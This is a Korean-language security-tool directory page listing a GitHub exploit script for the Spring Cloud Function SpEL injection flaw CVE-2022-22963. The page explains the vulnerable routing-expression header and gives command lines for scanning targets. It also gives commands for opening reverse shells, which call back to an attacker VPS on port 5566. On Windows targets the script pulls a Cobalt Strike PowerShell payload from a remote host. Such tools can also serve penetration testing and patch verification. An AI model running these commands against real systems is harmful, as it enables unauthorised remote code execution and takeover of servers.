Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
spring-cloud-function-rce — Spring Cloud Function SPEL 표현식 주입 취약점 (CVE-2022-22963) | Kitploit
도구/GitHubGitHub/k3rwin/spring-cloud-function-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubk3rwin/spring-cloud-function-rce

spring-cloud-function-rce

Spring Cloud Function SPEL 표현식 주입 취약점 (CVE-2022-22963)

저장소 보기
834년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Spring Cloud Function SPEL 표현식 주입 취약점 (CVE-2022-22963)

Spring 프레임워크는 현대 자바 기반 엔터프라이즈 애플리케이션(모든 유형의 배포 플랫폼)을 위한 포괄적인 프로그래밍 및 구성 모델을 제공합니다.

Spring Cloud의 서버리스 프레임워크인 Spring Cloud Function의 RoutingFunction 클래스의 apply 메서드는 요청 헤더의 "spring.cloud.function.routing-expression" 매개변수를 Spel 표현식으로 처리하여 Spel 표현식 주입을 유발하며, 공격자는 이 취약점을 통해 임의 코드를 실행할 수 있습니다.

영향 범위: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

스크립트는 학습 목적으로만 사용되며, 다른 용도로 사용할 경우 발생하는 법적 책임은 작성자와 무관합니다

1.installation(설치 모듈)

root@kitploit:~
pip3 install -r requirements.txt	

2.Usage(사용법)

python3 spring-cloud-function-rce.py -h

image-20220414184058525

-u 단일 URL을 지정하여 dnslog 테스트 수행

-e 리버스 셸 모드 지정

-s 대상 호스트 운영체제 지정, 기본값 linux, 매개변수는 win/linux -i 및 -c 매개변수와 함께 사용

3.example(사용 예제)

3.1 단일 url 테스트

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/"

image-20220414184202055

3.2 다중 url 테스트

python3 spring-cloud-function-rce.py -f "urls.txt"

image-20220414184424640

  • 123.58.236.76:47874는 vulfocus의 docker 실습 환경으로, nslookup 명령어가 설치되어 있지 않아 dnslog 테스트가 실패했습니다.
  • 다중 URL 주소는 반드시 웹사이트 루트 디렉터리여야 합니다. http://192.168.50.222:8080/는 로컬에 구축한 실습 환경의 루트 디렉터리이며, test 디렉터리를 추가하면 poc가 적용되지 않습니다.

3.3 linux 타겟 getShell

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -i "vps의 ip주소:5566"

image-20220414185231029

3.4 windows 타겟 getShell

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -s "win" -c "http://vps/a"

-c는 cs가 생성한 powershell 업로드 코드의 주소를 지정하며, 반드시 -s "win"과 함께 사용해야 합니다. -c 옵션은 windows 환경에서 스크립트를 실행해야 하며, 스크립트는 powershell을 호출하여 poc 인코딩을 수행합니다.

image-20220414185711222

image-20220414190020294

4. 실습 환경

4.1 idea로 직접 구축

참고 주소

4.2 docker 실습 환경

vulfocus

image-20220414190509578

도구 다운로드